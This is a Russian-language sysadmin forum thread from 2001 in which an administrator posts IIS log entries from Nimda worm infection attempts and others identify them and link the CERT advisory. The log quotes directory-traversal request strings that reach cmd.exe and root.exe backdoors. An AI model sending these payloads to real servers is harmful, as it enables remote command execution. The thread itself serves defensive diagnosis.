информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Все любят медСетевые кракеры и правда о деле Левина
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Фишинговая атака на Python-разработчиков 
 ФБР нашла русский след в атаках... 
 Массовый взлом SharePoint 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / sysadmin
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
CERT Advisory CA-2001-26 Nimda Worm 19.09.01 11:29  Число просмотров: 1063
Автор: ayc Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Это новый вирус, массивно атакующий известные дырки софта MS.

http://www.cert.org/advisories/CA-2001-26.html
<sysadmin>
опять атакуют IIS 18.09.01 23:09  
Автор: ayc Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Сегодня на нескольких наших сайтах (не связанных) половина запросов - попытки взлома и заражения IIS. В инете уже полно зараженных сайтов, показывающих readme.eml и ругаень в адрес правительства США. Что это за вирус? (непохоже чтобы вручную ломали)

reqs: file
----: ----
49: /scripts/..%255c../winnt/system32/cmd.exe
49: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
44: /scripts/..%5c../winnt/system32/cmd.exe
44: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
34: /scripts/root.exe
34: /scripts/root.exe?/c+dir
31: /msadc/root.exe
31: /msadc/root.exe?/c+dir
27: /d/winnt/system32/cmd.exe
27: /d/winnt/system32/cmd.exe?/c+dir
27: /c/winnt/system32/cmd.exe
27: /c/winnt/system32/cmd.exe?/c+dir
23: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
23: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
23: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
23: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
22: /scripts/winnt/system32/cmd.exe
22: /scripts/winnt/system32/cmd.exe?/c+dir
22: /scripts/..%c1%9c../winnt/system32/cmd.exe
22: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
22: /scripts/..%252f../winnt/system32/cmd.exe
22: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
22: /scripts/..%c0%af../winnt/system32/cmd.exe
22: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
22: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
22: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
22: /scripts/..%c1%1c../winnt/system32/cmd.exe
22: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Apache то же атакуют ..... как IIS ;-) 20.09.01 16:53  
Автор: Falcon Статус: Незарегистрированный пользователь
<"чистая" ссылка>
CERT Advisory CA-2001-26 Nimda Worm 19.09.01 11:29  
Автор: ayc Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Это новый вирус, массивно атакующий известные дырки софта MS.

http://www.cert.org/advisories/CA-2001-26.html
IMHO, это тебя так сканируют:) 19.09.01 09:44  
Автор: йцукенг <jcukeng> Статус: Member
<"чистая" ссылка>
на предмет "Unicode bug"
пока только пытаются выполнить команду dir.
автоматически это делают или вручную, можно понять, посмотрев в логах на время запросов.
удачи,
йцукенг
IMHO, это тебя так сканируют:) 19.09.01 11:31  
Автор: ayc Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> на предмет "Unicode bug"
> пока только пытаются выполнить команду dir.
> автоматически это делают или вручную, можно понять,
> посмотрев в логах на время запросов.
> удачи,
> йцукенг

Это все-таки проделки нового сетевого вируса.
http://www.cert.org/advisories/CA-2001-26.html
Думаю, и в своих логах вы тоже уже это обнаружите.
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2025 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach